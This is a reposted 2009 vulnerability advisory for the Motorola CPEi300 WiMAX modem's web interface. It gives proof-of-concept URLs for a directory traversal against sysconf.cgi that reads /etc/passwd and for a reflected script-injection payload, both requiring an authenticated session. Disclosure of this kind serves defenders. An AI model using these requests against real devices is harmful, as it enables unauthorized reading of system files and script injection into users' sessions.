Computer Security
[EN] securityvulns.ru
no-pyccku

  

Related information

  Motorola CPEi300 WiMAX modem web interface multiple security vulnerabilities

From:usman <usman_(at)_xc0re.net>
Date:30.01.2009
Subject:Motorola Wimax Modem CPEi300 Multiple Vulnerabilities

#################################################################################
####
#
#   Name    :   Motorola Wimax modem CPEi300 Multiple Vulnerabilities
#   Author  :   Usman Saeed
#   Company :   Xc0re Security Reasearch Group
#   Homepage :  http://www.xc0re.net
#
#################################################################################
####


[Note: User needs to logged in! ]

[*] Attack type : Remote

[*] Patch Status : Unpatched

[*] Exploitation :

  [+] Directory traversal
      
http://Hostname/cgi-bin/sysconf.cgi?page=../../..
/etc/passwd&action=request&sid=AeoFSFoI4lDs

  [+] XSS

      
http://Hostname/cgi-bin/sysconf.
cgi?page="><script>alert(1);</script>"&actio
n=request&sid=AeoFSFoI4lDs


About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 



Rating@Mail.ru